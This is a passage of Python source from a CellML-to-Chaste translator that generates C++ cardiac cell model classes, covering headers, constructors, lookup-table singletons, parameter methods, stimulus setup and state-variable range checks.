self.writeln('else ', varname, self.EQ_ASSIGN, min, self.STMT_END)
else:
self.writeln('_oob_', idx, self.EQ_ASSIGN, 'true', self.STMT_END)
self.writeln('#undef COVERAGE_IGNORE', indent=False)
self.close_block(blank_line=False)
def output_table_index_generation_code(self, key, idx):
"""Method called by output_table_index_generation to output the code for a single table."""
index_type = 'const unsigned '
factor_type = 'const double '
row_type = 'const double* const '
var = key[-1]
min, max, _, step_inverse = self.lut_parameters(key)
offset = '_offset_' + idx
offset_over_step = offset + '_over_table_step'
varname = self.code_name(var)
self.writeln(self.TYPE_CONST_DOUBLE, offset, self.EQ_ASSIGN, varname, ' - ', min, self.STMT_END)
self.writeln(self.TYPE_CONST_DOUBLE, offset_over_step, self.EQ_ASSIGN,
offset, ' * ', step_inverse, self.STMT_END)
idx_var = '_table_index_' + str(idx)
if self.config.options.lookup_type == 'nearest-neighbour':
if self.lt_index_uses_floor:
self.writeln(index_type, idx_var, ' = (unsigned) round(', offset_over_step, ');')
else:
self.writeln(index_type, idx_var, ' = (unsigned) (', offset_over_step, '+0.5);')
else:
if self.lt_index_uses_floor:
self.writeln(index_type, idx_var, ' = (unsigned) floor(', offset_over_step, ');')
else:
self.writeln(index_type, idx_var, ' = (unsigned)(', offset_over_step, ');')
factor = self.lut_factor(idx)
if factor:
self.writeln(factor_type, factor, ' = ', offset_over_step, ' - ', idx_var, self.STMT_END)
if self.row_lookup_method:
self.writeln(row_type, '_lt_', idx, '_row = ', self.lookup_method_prefix, '_lookup_', idx,
'_row(', idx_var, self.lut_factor(idx, include_comma=True), ');')
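# Worked example for output_table_index_generation_code above. Assuming index
# 0, a table keyed on var_V with min 0 and step 0.01 (step_inverse 100.0),
# linear interpolation and lt_index_uses_floor False, the generated C++ is:
#   const double _offset_0 = var_V - 0;
#   const double _offset_0_over_table_step = _offset_0 * 100.0;
#   const unsigned _table_index_0 = (unsigned)(_offset_0_over_table_step);
#   const double _factor_0 = _offset_0_over_table_step - _table_index_0;
# and, when row_lookup_method is enabled (lookup prefix omitted here):
#   const double* const _lt_0_row = _lookup_0_row(_table_index_0, _factor_0);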
class CellMLToChasteTranslator(CellMLTranslator):
"""
As CellMLTranslator, but targets more recent Chaste style.
Includes the ability to output a cell that can solve itself using
backward Euler, if the appropriate analyses have been done on the
model. (See the -J and -j options to translate.py.)
"""
# We want separate .cpp/.hpp files
USES_SUBSIDIARY_FILE = True
# Type of (a reference to) the state variable vector
TYPE_VECTOR = 'std::vector<double> '
TYPE_VECTOR_REF = 'std::vector<double>& '
def writeln_hpp(self, *args, **kwargs):
"""Convenience wrapper for writing to the header file."""
kwargs['subsidiary'] = True
self.writeln(*args, **kwargs)
def translate(self, *args, **kwargs):
"""Generate code for the given model."""
our_kwargs = {'use_chaste_stimulus': False,
'separate_lut_class': True,
'convert_interfaces': False,
'use_modifiers': False,
'use_data_clamp': False,
'dynamically_loadable': False,
'use_protocol': False
}
for key, default in our_kwargs.iteritems():
setattr(self, key, kwargs.get(key, default))
if key in kwargs:
del kwargs[key]
# Some other default settings
self.use_backward_euler = False
self.include_serialization = False
# Last method's access specification
self._last_method_access = 'private'
return super(CellMLToChasteTranslator, self).translate(*args, **kwargs)
def final_configuration_hook(self):
"""Set the LT method prefix (requires self.class_name to be set)."""
if self.separate_lut_class:
self.lt_class_name = self.class_name + '_LookupTables'
self.lookup_method_prefix = self.lt_class_name + '::Instance()->'
return super(CellMLToChasteTranslator, self).final_configuration_hook()
def output_includes(self, base_class=None):
"""Output the start of each output file.
As well as the #include lines, this also outputs the include guard for
the .hpp file and the doxygen file comment.
If base_class is not None (and self.use_backward_euler isn't set)
then includes that class' header instead of AbstractCardiacCell.
If self.dynamically_loadable is set, includes extra headers needed
for that case.
Reads self.include_serialization and self.use_backward_euler.
Sets self.base_class_name and self.class_inheritance.
"""
self.writeln_hpp('#ifndef ', self.include_guard)
self.writeln_hpp('#define ', self.include_guard, '\n')
for sub in [False, True]:
self.output_doxygen('@file\n\n',
'This source file was generated from CellML.\n\n',
'Model: ', self.model.name, '\n\n',
version_comment(self.add_timestamp),
'\n\n<autogenerated>',
subsidiary=sub)
self.writeln(subsidiary=sub)
# .cpp should include .hpp
self.writeln('#include "', os.path.basename(self.subsidiary_filename), '"')
if self.include_serialization:
self.writeln_hpp('#include "ChasteSerialization.hpp"')
self.writeln_hpp('#include <boost/serialization/base_object.hpp>')
self.writeln('#include <cmath>')
self.writeln('#include <cassert>')
self.writeln('#include <memory>')
if self.use_backward_euler:
self.writeln_hpp('#include "AbstractBackwardEulerCardiacCell.hpp"')
self.writeln('#include "CardiacNewtonSolver.hpp"')
self.base_class_name = 'AbstractBackwardEulerCardiacCell<' + \
str(self.nonlinear_system_size) + '>'
elif self.options.rush_larsen:
self.base_class_name = 'AbstractRushLarsenCardiacCell'
self.writeln_hpp('#include "' + self.base_class_name + '.hpp"')
if not self.doc._cml_rush_larsen:
self.writeln('#include "Warnings.hpp"')
elif self.options.grl1:
self.base_class_name = 'AbstractGeneralizedRushLarsenCardiacCell'
self.writeln_hpp('#include "' + self.base_class_name + '.hpp"')
elif self.options.grl2: #1992 TODO: merge with above case
self.base_class_name = 'AbstractGeneralizedRushLarsenCardiacCell'
self.writeln_hpp('#include "' + self.base_class_name + '.hpp"')
elif base_class:
self.base_class_name = base_class
self.writeln_hpp('#include "' + self.base_class_name + '.hpp"')
else:
self.base_class_name = 'AbstractCardiacCell'
self.writeln_hpp('#include "' + self.base_class_name + '.hpp"')
if self.use_modifiers:
self.writeln_hpp('#include "AbstractCardiacCellWithModifiers.hpp"')
self.writeln_hpp('#include "AbstractModifier.hpp"')
# Modify the base class name
self.base_class_name = 'AbstractCardiacCellWithModifiers<' + self.base_class_name + ' >'
self.class_inheritance = ' : public ' + self.base_class_name
if self.dynamically_loadable:
self.writeln_hpp('#include "AbstractDynamicallyLoadableEntity.hpp"')
self.class_inheritance += ', public AbstractDynamicallyLoadableEntity'
if self.use_protocol:
self.writeln_hpp('#include "AbstractTemplatedSystemWithOutputs.hpp"')
self.class_inheritance += ', public AbstractTemplatedSystemWithOutputs<' + self.TYPE_VECTOR + '>'
self.writeln('#include "Exception.hpp"')
self.writeln('#include "OdeSystemInformation.hpp"')
self.writeln('#include "RegularStimulus.hpp"')
self.writeln_hpp('#include "AbstractStimulusFunction.hpp"')
self.writeln('#include "HeartConfig.hpp"')
self.writeln('#include "IsNan.hpp"')
self.writeln('#include "MathsCustomFunctions.hpp"')
self.writeln()
self.writeln_hpp()
def set_access(self, access):
"""Set the access specification for subsequent output.
We keep track of the last access set, either via this method or
output_method_start, and only output a new declaration to the
header file if it changes.
"""
if access != self._last_method_access:
self._last_method_access = access
self.writeln_hpp()
self.writeln_hpp(access, ':', indent_offset=-1)
def output_method_start(self, method_name, args, ret_type, access=None, defaults=[]):
"""Output the start of a method declaration/definition.
Will write to both the .hpp and .cpp file.
We keep track of the access of the last method, and only output a new
declaration to the header file if it changes. The default is to use
the same access specification as last time.
"""
DEBUG('translator', 'Generating code for method', method_name)
if access:
self.set_access(access)
if ret_type:
if ret_type[-1] != ' ':
ret_type = ret_type + ' '
else:
ret_type = ''
args_string_cpp = ', '.join(filter(None, map(str, args)))
if defaults:
assert len(defaults) == len(args)
args_with_default = []
for (arg, default) in zip(map(str, args), map(str, defaults)):
if arg:
if default:
args_with_default.append(arg + '=' + default)
else:
args_with_default.append(arg)
args_string_hpp = ', '.join(args_with_default)
else:
args_string_hpp = args_string_cpp
self.writeln_hpp(ret_type, method_name, '(', args_string_hpp, ')', self.STMT_END)
self.writeln(ret_type, self.class_name, '::', method_name, '(', args_string_cpp, ')')
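# For example, the call used later in this class,
#   self.output_method_start('GetIntracellularCalciumConcentration', [],
#                            self.TYPE_DOUBLE, 'public')
# emits 'double GetIntracellularCalciumConcentration();' to the .hpp (after a
# 'public:' specifier if the access changed) and
# 'double <ClassName>::GetIntracellularCalciumConcentration()' to the .cpp.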
def output_derived_quantities(self):
"""Output a ComputeDerivedQuantities method if any such quantities exist.
Looks for variables annotated with pycml:derived-quantity=yes, and generates
a method to compute all these variables from a given state.
"""
dqs = self.derived_quantities
if dqs:
self.output_method_start('ComputeDerivedQuantities',
[self.TYPE_DOUBLE + self.code_name(self.free_vars[0]),
'const ' + self.TYPE_VECTOR + '& rY'], # We need it to really be a reference
self.TYPE_VECTOR, access='public')
self.open_block()
self.output_comment('Inputs:')
self.output_comment('Time units: ', self.free_vars[0].units)
# Work out what equations are needed
if self.use_chaste_stimulus:
i_stim = [self.doc._cml_config.i_stim_var]
else:
i_stim = []
if self.use_data_clamp:
prune = [self.config.i_data_clamp_data]
else:
prune = []
nodeset = self.calculate_extended_dependencies(dqs, prune_deps=i_stim, prune=prune)
# State variable inputs
self.output_state_assignments(assign_rY=False, nodeset=nodeset)
self.writeln()
table_index_nodes_used = self.calculate_lookup_table_indices(nodeset, self.code_name(self.free_vars[0]))
# Output equations
self.output_comment('Mathematics')
self.output_equations(nodeset - table_index_nodes_used)
self.writeln()
# Assign to results vector
self.writeln(self.vector_create('dqs', len(dqs)))
for i, var in enumerate(dqs):
self.writeln(self.vector_index('dqs', i), self.EQ_ASSIGN, self.code_name(var), self.STMT_END)
self.writeln('return dqs', self.STMT_END)
self.close_block(blank_line=True)
def output_serialize_method(self):
"""This method outputs the boost serialize method for the
header files that need it."""
# Serialization
if self.include_serialization:
self.writeln_hpp('friend class boost::serialization::access;')
self.writeln_hpp('template<class Archive>')
self.writeln_hpp('void serialize(Archive & archive, const unsigned int version)')
self.open_block(subsidiary=True)
self.writeln_hpp('archive & boost::serialization::base_object<', self.base_class_name,
' >(*this);')
if self.dynamically_loadable:
self.writeln_hpp('archive & boost::serialization::base_object<AbstractDynamicallyLoadableEntity>(*this);')
if self.use_modifiers:
self.output_comment('Despite this class having modifier member variables, they are all added to the', subsidiary=True)
self.output_comment('abstract class by the constructor, and archived via that, instead of here.', subsidiary=True)
self.close_block(subsidiary=True)
def output_cell_parameters(self):
"""Output declarations, set & get methods for cell parameters.
Sets self.cell_parameters to be those constant variables annotated with
pycml:modifiable-parameter. These use the mParameters functionality in
Chaste.
Also collects any variables annotated with an RDF oxmeta name into
self.metadata_vars. Only constants and state variables are included.
"""
# Find annotated parameters
self.cell_parameters = filter(
lambda v: v.is_modifiable_parameter,
cellml_metadata.find_variables(self.model,
('pycml:modifiable-parameter', NSS['pycml']),
'yes'))
# Reduce intra-run variation
self.cell_parameters.sort(key=self.var_display_name)
for i, var in enumerate(self.cell_parameters):
# Remember the var's index
var._cml_param_index = i
# Create set of all oxmeta-annotated variables
vars = cellml_metadata.find_variables(self.model, ('bqbiol:is', NSS[u'bqbiol']))
# Keep only the variables with an oxmeta name
vars = filter(lambda v: v.oxmeta_name, vars)
# We're interested in anything that isn't time or the stimulus
self.metadata_vars = set([v for v in vars if v.get_type() != VarTypes.Free])
self.metadata_vars.discard(self.doc._cml_config.i_stim_var)
self.metadata_vars = list(self.metadata_vars)
self.metadata_vars.sort(key=self.var_display_name)
# #1464 Create a set of metadata variables that will have modifiers
# We want to avoid writing out metadata for stimulus current as it is used once and then discarded.
# \todo - use protocol information to put only the required modifiers into this list.
self.modifier_vars = [v for v in self.metadata_vars if v.oxmeta_name not in cellml_metadata.STIMULUS_NAMES]
self.modifier_vars.sort(key=self.var_display_name)
# Generate member variable declarations
self.set_access('private')
if self.metadata_vars:
self.output_comment('\nSettable parameters and readable variables\n', subsidiary=True)
# Write out the modifier member variables.
if self.use_modifiers:
for var in self.modifier_vars:
self.writeln_hpp('boost::shared_ptr<AbstractModifier> mp_' + var.oxmeta_name + '_modifier', self.STMT_END)
# Methods associated with oxmeta annotated variables
# Don't use LT & modifiers for the const methods
use_modifiers = self.use_modifiers
self.use_modifiers = False
use_lt = self.use_lookup_tables
self.use_lookup_tables = False
for var in self.metadata_vars:
if var.is_statically_const(ignore_annotations=True):
# self.output_method_start('Get_' + var.oxmeta_name + '_constant', [], self.TYPE_DOUBLE)
# self.open_block()
# self.output_comment('Constant value given in CellML')
# nodeset = self.calculate_extended_dependencies([var])
# self.output_equations(nodeset)
# self.writeln('return ', self.code_name(var), self.STMT_END)
# self.close_block()
# self.writeln()
if var in self.cell_parameters and var in self.modifier_vars:
# 'Forget' its index, so normal code generation occurs (#1647)
var._cml_has_modifier = True
self.use_lookup_tables = use_lt
self.use_modifiers = use_modifiers
self.output_default_stimulus()
self.output_intracellular_calcium()
# Find & store derived quantities, for use elsewhere
self.derived_quantities = cellml_metadata.find_variables(self.model,
('pycml:derived-quantity', NSS['pycml']),
'yes')
# Reduce intra-run variation
self.derived_quantities.sort(key=self.var_display_name)
def output_default_stimulus(self):
"""
Output a default cell stimulus from the metadata specification
as long as the following metadata exists:
* membrane_stimulus_current_amplitude
* membrane_stimulus_current_duration
* membrane_stimulus_current_period
and optionally:
* membrane_stimulus_current_offset
* membrane_stimulus_current_end
Ensures that the amplitude of the generated RegularStimulus is negative.
"""
vars = dict()
for n in ['duration', 'amplitude', 'period', 'offset', 'end']:
vars[n] = self.model.get_variable_by_oxmeta_name('membrane_stimulus_current_'+n, throw=False)
if not (vars['duration'] and vars['amplitude'] and vars['period']):
self.has_default_stimulus = False
return
self.has_default_stimulus = True
nodeset = self.calculate_extended_dependencies(filter(None, vars.values()))
self.output_method_start('UseCellMLDefaultStimulus', [], 'boost::shared_ptr<RegularStimulus>', 'public')
self.open_block()
self.output_comment('Use the default stimulus specified by CellML metadata')
self.output_equations(nodeset)
self.writeln('boost::shared_ptr<RegularStimulus> p_cellml_stim(new RegularStimulus(')
self.writeln(' -fabs(', self.code_name(vars['amplitude']), '),')
self.writeln(' ', self.code_name(vars['duration']), ',')
self.writeln(' ', self.code_name(vars['period']), ',')
if vars['offset']:
self.writeln(' ', self.code_name(vars['offset']))
else:
self.writeln(' 0.0')
if vars['end']:
self.writeln(' , ', self.code_name(vars['end']))
self.writeln(' ))', self.STMT_END)
self.writeln('mpIntracellularStimulus = p_cellml_stim', self.STMT_END)
self.writeln('return p_cellml_stim', self.STMT_END)
self.close_block(blank_line=True)
def output_intracellular_calcium(self):
"""
If a (state) variable has been annotated as cytosolic_calcium_concentration,
generate a GetIntracellularCalciumConcentration method.
"""
# Find cytosolic_calcium_concentration
cai = self.doc.model.get_variable_by_oxmeta_name('cytosolic_calcium_concentration', throw=False)
if cai and cai in self.state_vars:
i = self.state_vars.index(cai)
self.output_method_start('GetIntracellularCalciumConcentration', [], self.TYPE_DOUBLE, 'public')
self.open_block()
self.writeln('return ', self.vector_index('mStateVariables', i), self.STMT_END)
self.close_block(blank_line=True)
def code_name(self, var, *args, **kwargs):
"""
Return the full name of var in a form suitable for inclusion in a source file.
Overrides the base class version to access mParameters for parameters.
"""
if hasattr(var, '_cml_param_index') and not (self.use_modifiers and getattr(var, '_cml_has_modifier', False)):
return self.vector_index('mParameters', var._cml_param_index)
elif var is getattr(self.model, u'_cml_Chaste_Cm', None):
return 'HeartConfig::Instance()->GetCapacitance()'
elif hasattr(var, '_cml_code_name'):
return var._cml_code_name % {'time': self.code_name(self.free_vars[0])}
else:
return super(CellMLToChasteTranslator, self).code_name(var, *args, **kwargs)
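# Sketch of the dispatch above (names illustrative): a modifiable parameter
# with var._cml_param_index == 3 renders as 'mParameters[3]'; the special
# Chaste membrane capacitance variable renders as
# 'HeartConfig::Instance()->GetCapacitance()'; anything else falls through to
# the base class naming scheme.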
def output_top_boilerplate(self):
"""Output top boilerplate.
This method outputs the constructor and destructor of the cell
class, and also lookup table declarations and lookup methods.
It also calls output_verify_state_variables.
"""
self.include_serialization = True
# Check if we're generating a Backward Euler model
self.use_backward_euler = self.model.get_option('backward_euler')
self.use_analytic_jacobian = (self.model.get_option('maple_output') and hasattr(self.model.solver_info, u'jacobian'))
if self.use_backward_euler:
assert hasattr(self.model, u'solver_info')
# Find the size of the nonlinear system
num_linear_odes = len(self.model.solver_info.xml_xpath(u'solver:linear_odes/m:math/m:apply'))
self.nonlinear_system_size = len(self.state_vars) - 1 - num_linear_odes
nonlinear_entries = self.model.solver_info.xml_xpath(u'solver:jacobian/solver:entry/@var_j')
self.nonlinear_system_vars = map(self.varobj, nonlinear_entries[:self.nonlinear_system_size])
# Start output
self.output_includes()
if self.use_backward_euler or self.options.rush_larsen or self.options.grl1 or self.options.grl2:
# Keep the same signature as forward cell models, but note that the solver isn't used
solver1 = 'boost::shared_ptr<AbstractIvpOdeSolver> /* unused; should be empty */'
solver2 = ''
#solver1 = solver2 = ''
else:
solver1 = 'boost::shared_ptr<AbstractIvpOdeSolver> pSolver'
solver2 = 'pSolver'
if self.use_lookup_tables and self.separate_lut_class:
self.output_lut_class()
# Cell model class
self.writeln_hpp('class ', self.class_name, self.class_inheritance)
self.open_block(subsidiary=True)
# Put the boost serialize() method in if requested.
self.output_serialize_method()
# Parameter declarations, and set & get methods (#666)
self.output_cell_parameters()
# Constructor
self.set_access('public')
self.output_constructor([solver1, 'boost::shared_ptr<AbstractStimulusFunction> pIntracellularStimulus'],
[solver2, len(self.state_vars), self.unsigned_v_index, 'pIntracellularStimulus'])
# Destructor
self.output_method_start('~'+self.class_name, [], '')
self.open_block()
self.close_block()
# Other declarations & methods
self.output_chaste_lut_methods()
self.output_verify_state_variables()
return
@property
def unsigned_v_index(self):
if self.v_index == -1:
return 'UNSIGNED_UNSET'
else:
return str(self.v_index)
def output_verify_state_variables(self):
"""Output the VerifyStateVariables method.
This will look for state variables annotated with pycml:range-low and/or pycml:range-high,
which specify allowable ranges for these variables. The generated method will check that
they are within the range. Both limits are included, i.e. they specify a closed interval.
"""
# First work out if there are any constraints on state variables
low_prop = ('pycml:range-low', NSS['pycml'])
high_prop = ('pycml:range-high', NSS['pycml'])
low_range_vars = filter(
lambda v: v.get_type() == VarTypes.State,
cellml_metadata.find_variables(self.model, low_prop))
high_range_vars = filter(
lambda v: v.get_type() == VarTypes.State,
cellml_metadata.find_variables(self.model, high_prop))
nodeset = set(low_range_vars + high_range_vars)
# If not, don't bother writing the method, an empty implementation is in the abstract classes.
if nodeset:
self.output_method_start('VerifyStateVariables', [], 'void')
self.open_block()
using_cvode = (self.TYPE_VECTOR_REF == CellMLToCvodeTranslator.TYPE_VECTOR_REF)
if using_cvode:
self.writeln('/* We only expect CVODE to keep state variables to within its tolerances,')
self.writeln(' * not exactly the bounds prescribed to each variable that are checked here.')
self.writeln(' *')
self.writeln(' * For 99.99% of paces this->mAbsTol works,')
self.writeln(' * For 99.999% of paces 10*this->mAbsTol is fine,')
self.writeln(' * but unfortunately 100x seems to be required on rare occasions for upstrokes.')
self.writeln(' * This sounds bad, but is probably typically only 1e-5 or 1e-6.')
self.writeln(' */')
self.writeln('const double tol = 100*this->mAbsTol;')
self.output_state_assignments(nodeset=nodeset)
error_template = 'EXCEPTION(DumpState("State variable {0} has gone out of range. Check numerical parameters, for example time and space stepsizes, and/or solver tolerances"));'
additional_tolerance_adjustment = ''
for var in low_range_vars:
if using_cvode:
additional_tolerance_adjustment = ' - tol'
self.writeln('if (', self.code_name(var), ' < ', var.get_rdf_annotation(low_prop), additional_tolerance_adjustment, ')')
self.open_block()
#self.writeln('std::cout << "Too small: ', self.code_name(var), ' = " << ', self.code_name(var) , ' << std::endl << std::flush;')
self.writeln(error_template.format(self.var_display_name(var)))
self.close_block(False)
for var in high_range_vars:
if using_cvode:
additional_tolerance_adjustment = ' + tol'
self.writeln('if (', self.code_name(var), ' > ', var.get_rdf_annotation(high_prop), additional_tolerance_adjustment, ')')
self.open_block()
#self.writeln('std::cout << "Too large: ', self.code_name(var), ' = " << ', self.code_name(var) , ' << std::endl << std::flush;')
self.writeln(error_template.format(self.var_display_name(var)))
self.close_block(False)
self.close_block(True)
def output_constructor(self, params, base_class_params):
"""Output a cell constructor.
params is a list of constructor parameters, entries of which should be strings
including both type and parameter name, which will be included verbatim in the
generated code.
base_class_params is a list of parameters to be supplied to the base class
constructor. Entries will be converted to strings.
"""
self.output_method_start(self.class_name, params, '', access='public')
self.writeln(' : ', self.base_class_name, '(')
# Filter out empty params, to make backward Euler happy
base_class_params = filter(None, map(str, base_class_params))
for i, param in enumerate(base_class_params):
if i == len(base_class_params)-1: comma = ')'
else: comma = ','
self.writeln(param, comma, indent_offset=3)
self.open_block()
self.output_comment('Time units: ', self.free_vars[0].units, '\n')
self.writeln('this->mpSystemInfo = OdeSystemInformation<',
self.class_name, '>::Instance();')
if self.v_index == -1 and self.v_variable:
self.writeln('this->mVoltageIndex = GetAnyVariableIndex("',
self.var_display_name(self.v_variable), '");')
if self.config.options.include_dt_in_tables:
self.writeln(self.lt_class_name, '::Instance()->SetTimestep(mDt);')
self.writeln('Init();\n')
#1861 - Rush-Larsen
if self.options.rush_larsen and not self.doc._cml_rush_larsen:
self.writeln('WARNING("No elligible gating variables found for this Rush-Larsen cell model; using normal forward Euler.");')
#1463 - default cellML stimulus
if self.has_default_stimulus:
self.output_comment('We have a default stimulus specified in the CellML file metadata')
self.writeln('this->mHasDefaultStimulusFromCellML = true', self.STMT_END)
#1464 - cleverer modifiers...
if self.use_modifiers and self.modifier_vars:
self.output_comment('These will get initialised to DummyModifiers in the base class method.')
for var in self.modifier_vars:
self.writeln('this->AddModifier("' + var.oxmeta_name + '",')
self.writeln(' mp_' + var.oxmeta_name + '_modifier)', self.STMT_END)
#666 - initialise parameters
for var in self.cell_parameters:
if var.get_type() == VarTypes.Constant:
self.writeln(self.vector_index('this->mParameters', var._cml_param_index),
self.EQ_ASSIGN, var.initial_value, self.STMT_END, ' ',
self.COMMENT_START, var.fullname(), ' [', var.units, ']')
#1354 - specify protocol outputs
if self.use_protocol:
outputs = cellml_metadata.find_variables(self.model,
('pycml:output-variable', NSS['pycml']),
'yes')
def write_output_info(output):
if output.get_type() in [VarTypes.Free, VarTypes.Unknown]:
self.writeln('UNSIGNED_UNSET, FREE', indent=False, nl=False)
elif output.get_type() == VarTypes.State:
self.writeln(self.state_vars.index(output), ', STATE', indent=False, nl=False)
elif output.is_derived_quantity:
self.writeln(self.derived_quantities.index(output), ', DERIVED', indent=False, nl=False)
elif output.is_modifiable_parameter:
self.writeln(self.cell_parameters.index(output), ', PARAMETER', indent=False, nl=False)
else:
raise ValueError('Unexpected protocol output: ' + str(output))
if outputs:
outputs.sort(key=lambda v: self.var_display_name(v))
self.output_comment('Protocol outputs')
self.writeln('this->mOutputsInfo.resize(', len(outputs), ');')
for i, output in enumerate(outputs):
self.writeln('this->mOutputsInfo[', i, ']', self.EQ_ASSIGN,
'std::make_pair(', nl=False)
write_output_info(output)
self.writeln(')', self.STMT_END, indent=False)
self.writeln()
outputs = set(outputs)
#1925 - outputs that are vectors
prop = ('pycml:output-vector', NSS['pycml'])
vector_names = set(cellml_metadata.get_targets(self.model, None,
cellml_metadata.create_rdf_node(prop)))
self.writeln('this->mVectorOutputsInfo.resize(', len(vector_names), ');')
self.writeln('this->mVectorOutputNames.resize(', len(vector_names), ');')
for i, name in enumerate(sorted(vector_names)):
self.writeln('this->mVectorOutputNames[', i, ']', self.EQ_ASSIGN, '"', name, '"', self.STMT_END)
vector_outputs = cellml_metadata.find_variables(self.model, prop, name)
assert len(vector_outputs) > 0
vector_outputs.sort(key=lambda v: self.var_display_name(v))
self.writeln('this->mVectorOutputsInfo[', i, '].resize(', len(vector_outputs), ');')
for j, output in enumerate(vector_outputs):
self.writeln('this->mVectorOutputsInfo[', i, '][', j, ']', self.EQ_ASSIGN,
'std::make_pair(', nl=False)
write_output_info(output)
self.writeln(')', self.STMT_END, indent=False)
self.writeln()
outputs.update(vector_outputs)
#1910 - SED-ML name mappings
prop = ('pycml:alias', NSS['pycml'])
aliased_vars = cellml_metadata.find_variables(self.model, prop, None)
prop = cellml_metadata.create_rdf_node(prop)
for var in aliased_vars:
assert var in outputs
source = cellml_metadata.create_rdf_node(fragment_id=var.cmeta_id)
for alias in cellml_metadata.get_targets(self.model, source, prop):
name = self.var_display_name(var)
self.writeln('this->mNameMap["', alias, '"] = "', name, '";')
#2178 - set up model outputs environment from above info
self.writeln()
self.writeln('ProcessOutputsInfo();')
self.writeln()
#2428 - also record protocol inputs
inputs = cellml_metadata.find_variables(self.model, ('pycml:input-variable', NSS['pycml']), 'yes')
if inputs:
inputs.sort(key=lambda v: self.var_display_name(v))
self.writeln('this->mInputNames.reserve(', len(inputs), ');')
for input in inputs:
self.writeln('this->mInputNames.push_back("', self.var_display_name(input), '");')
# Lookup table generation, if not in a singleton
if self.use_lookup_tables and not self.separate_lut_class:
self.output_lut_generation()
self.output_extra_constructor_content()
self.close_block()
return
def output_extra_constructor_content(self):
"""Hook for subclasses to add further content to the constructor."""
pass
def output_chaste_lut_methods(self):
"""
Output lookup table declarations & methods, if not using a separate class,
or output the method to get a pointer to the lookup table collection.
"""
if self.use_lookup_tables:
if self.separate_lut_class:
self.output_method_start('GetLookupTableCollection', [], 'AbstractLookupTableCollection*')
self.open_block()
self.writeln('return ', self.lt_class_name, '::Instance();')
self.close_block()
else:
self.send_main_output_to_subsidiary()
self.output_lut_declarations()
self.output_lut_row_lookup_memory()
self.output_lut_methods()
self.send_main_output_to_subsidiary(False)
def lut_parameters(self, key):
"""Get the bounds and step size for a particular table.
key should be a key into self.lookup_table_indices.
Returns (min, max, step) suitable for putting in generated code.
"""
if self.separate_lut_class:
idx = self.doc.lookup_table_indexes[key]
return map(lambda s: 'mTable%s[%s]' % (s, idx), ['Mins', 'Maxs', 'Steps', 'StepInverses'])
else:
return super(CellMLToChasteTranslator, self).lut_parameters(key)
def output_lut_indexing_methods(self):
"""Output methods in the LT class for indexing the tables, and checking index bounds.
These will be methods like
const double * IndexTable0(double index_var);
if self.row_lookup_method, or like
void IndexTable0(double index_var, unsigned& index, double& factor);
otherwise, with
bool CheckIndex0(double& index_var);
for checking the bounds.
"""
for key, idx in self.doc.lookup_table_indexes.iteritems():
varname = self.code_name(key[-1])
method_name = 'IndexTable' + str(idx)
if self.row_lookup_method:
method = 'const double * %s(double %s)' % (method_name, varname)
else:
factor = self.lut_factor(idx)
idx_var = '_table_index_' + str(idx)
if factor:
factor = ', double& ' + factor
method = 'void %s(double %s, unsigned& %s%s)' % (method_name, varname, idx_var, factor)
self.writeln(method)
self.open_block()
self.output_table_index_generation_code(key, idx, call_method=False)
if self.row_lookup_method:
self.writeln('return _lt_', idx, '_row;')
self.close_block()
# And check the indexes
if self.config.options.check_lt_bounds:
self.writeln('#define COVERAGE_IGNORE', indent=False)
self.writeln('bool CheckIndex', idx, '(double& ', varname, ')')
self.open_block()
self.output_table_index_checking(key, idx, call_method=False)
self.writeln('return _oob_', idx, self.STMT_END)
self.close_block(blank_line=False)
self.writeln('#undef COVERAGE_IGNORE\n', indent=False)
def output_table_index_checking(self, key, idx, call_method=True):
"""Override base class method to call the methods on the lookup table class if needed."""
if self.separate_lut_class and call_method:
if self.config.options.check_lt_bounds:
var = key[-1]
varname = self.code_name(var)
self.writeln('const bool _oob_', idx, self.EQ_ASSIGN, self.lt_class_name,
'::Instance()->CheckIndex', idx, '(', varname, ')', self.STMT_END)
else:
super(CellMLToChasteTranslator, self).output_table_index_checking(key, idx)
def output_table_index_generation_code(self, key, idx, call_method=True):
"""Override base class method to call the methods on the lookup table class if needed."""
if self.separate_lut_class and call_method:
var = key[-1]
varname = self.code_name(var)
method_name = self.lt_class_name + '::Instance()->IndexTable' + str(idx)
if self.row_lookup_method:
self.writeln('const double* const _lt_', idx, '_row = ', method_name, '(', varname, ');')
else:
factor = self.lut_factor(idx, include_comma=True)
idx_var = '_table_index_' + str(idx)
self.writeln(method_name, '(', varname, ', ', idx_var, factor, ');')
else:
super(CellMLToChasteTranslator, self).output_table_index_generation_code(key, idx)
def output_lut_class(self):
"""Output a separate class for lookup tables.
This will live entirely in the .cpp file."""
# Lookup tables class
self.writeln('class ', self.lt_class_name, ' : public AbstractLookupTableCollection')
self.writeln('{')
self.writeln('public:')
self.set_indent(1)
# Method to get the table instance object
self.writeln('static ', self.lt_class_name, '* Instance()')
self.open_block()
self.writeln('if (mpInstance.get() == NULL)')
self.writeln('{')
self.writeln('mpInstance.reset(new ', self.lt_class_name, ');', indent_offset=1)
self.writeln('}')
self.writeln('return mpInstance.get();')
self.close_block()
# Method to free the table memory
self.writeln('void FreeMemory()')
self.open_block()
self.output_lut_deletion()
self.writeln('mNeedsRegeneration.assign(mNeedsRegeneration.size(), true);')
self.close_block()
# Table lookup methods
self.output_lut_methods()
self.output_lut_indexing_methods()
# Destructor
self.writeln('~', self.lt_class_name, '()')
self.open_block()
self.output_lut_deletion()
self.close_block()
# Make the class a singleton
self.writeln('protected:', indent_level=0)
self.writeln(self.lt_class_name, '(const ', self.lt_class_name, '&);')
self.writeln(self.lt_class_name, '& operator= (const ', self.lt_class_name, '&);')
# Constructor
self.writeln(self.lt_class_name, '()')
self.open_block()
self.writeln('assert(mpInstance.get() == NULL);')
if self.config.options.include_dt_in_tables:
self.writeln('mDt = HeartConfig::Instance()->GetOdeTimeStep();')
self.writeln('assert(mDt > 0.0);')
num_indexes = len(self.doc.lookup_table_indexes)
self.writeln('mKeyingVariableNames.resize(', num_indexes, ');')
self.writeln('mNumberOfTables.resize(', num_indexes, ');')
self.writeln('mTableMins.resize(', num_indexes, ');')
self.writeln('mTableSteps.resize(', num_indexes, ');')
self.writeln('mTableStepInverses.resize(', num_indexes, ');')
self.writeln('mTableMaxs.resize(', num_indexes, ');')
self.writeln('mNeedsRegeneration.resize(', num_indexes, ');')
for key, idx in self.doc.lookup_table_indexes.iteritems():
min, max, step, var = key
num_tables = unicode(self.doc.lookup_tables_num_per_index[idx])
self.writeln('mKeyingVariableNames[', idx, '] = "', self.var_display_name(var), '";')
self.writeln('mNumberOfTables[', idx, '] = ', num_tables, self.STMT_END)
